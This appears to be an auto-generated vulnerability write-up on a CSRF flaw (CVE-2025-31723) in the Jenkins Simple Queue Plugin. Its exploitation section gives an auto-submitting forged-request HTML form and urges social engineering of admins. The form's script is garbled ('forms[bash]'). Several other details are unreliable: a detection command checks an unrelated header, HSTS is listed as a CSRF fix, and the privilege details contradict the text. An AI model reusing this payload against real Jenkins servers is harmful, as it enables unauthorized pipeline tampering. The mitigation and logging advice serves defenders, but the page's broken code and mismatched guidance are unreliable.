Jenkins, Cross-Site Request Forgery (CSRF), CVE-2025-31723 (Medium)

Listen to this Post

How the CVE Works:

CVE-2025-31723 is a CSRF vulnerability in Jenkins Simple Queue Plugin (versions ≤1.4.6). Attackers craft malicious requests to alter the build queue order without user consent. By tricking an authenticated admin into clicking a malicious link, the attacker resets or reorders pending builds, disrupting CI/CD pipelines. The plugin fails to validate CSRF tokens, allowing unauthorized queue modifications.

DailyCVE Form:

Platform: Jenkins
Version: ≤1.4.6
Vulnerability: CSRF
Severity: Medium
Date: 04/17/2025

What Undercode Say:

Exploitation:

  1. Craft a malicious HTML page with a forged request:
    </li>
    </ol>
    
    <form action="http://jenkins-server/queue/rebuild" method="POST">
    <input type="hidden" name="job" value="target-build">
    </form>
    
    <script>document.forms[bash].submit();</script>
    

    2. Use social engineering to lure admins.

    Mitigation:

    1. Upgrade to Simple Queue Plugin >1.4.6.

    1. Enable CSRF protection in Jenkins (Manage Jenkins > Configure Global Security).

    3. Add `Strict-Transport-Security` headers.

    Detection:

    curl -I http://jenkins-server/queue | grep X-Jenkins-CLI-Port
    

    Analytics:

    • Attack Vector: Network
    • Privilege Required: Low (authenticated user)
    • CVSS Score: 6.5 (Medium)
    • Exploitability: High (low skill required)

    Patch Verification:

    java -jar jenkins-cli.jar -s http://jenkins-server/ list-plugins | grep simple-queue
    

    Workaround:

    Revoke unnecessary queue-modification permissions via `Role-Based Strategy Plugin`.

    Logging:

    Monitor `access.log` for suspicious `/queue/rebuild` POST requests.

    References:

    (End of technical details. No additional commentary.)

    Sources:

    Reported By: nvd.nist.gov
    Extra Source Hub:
    Undercode

    Join Our Cyber World:

    💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top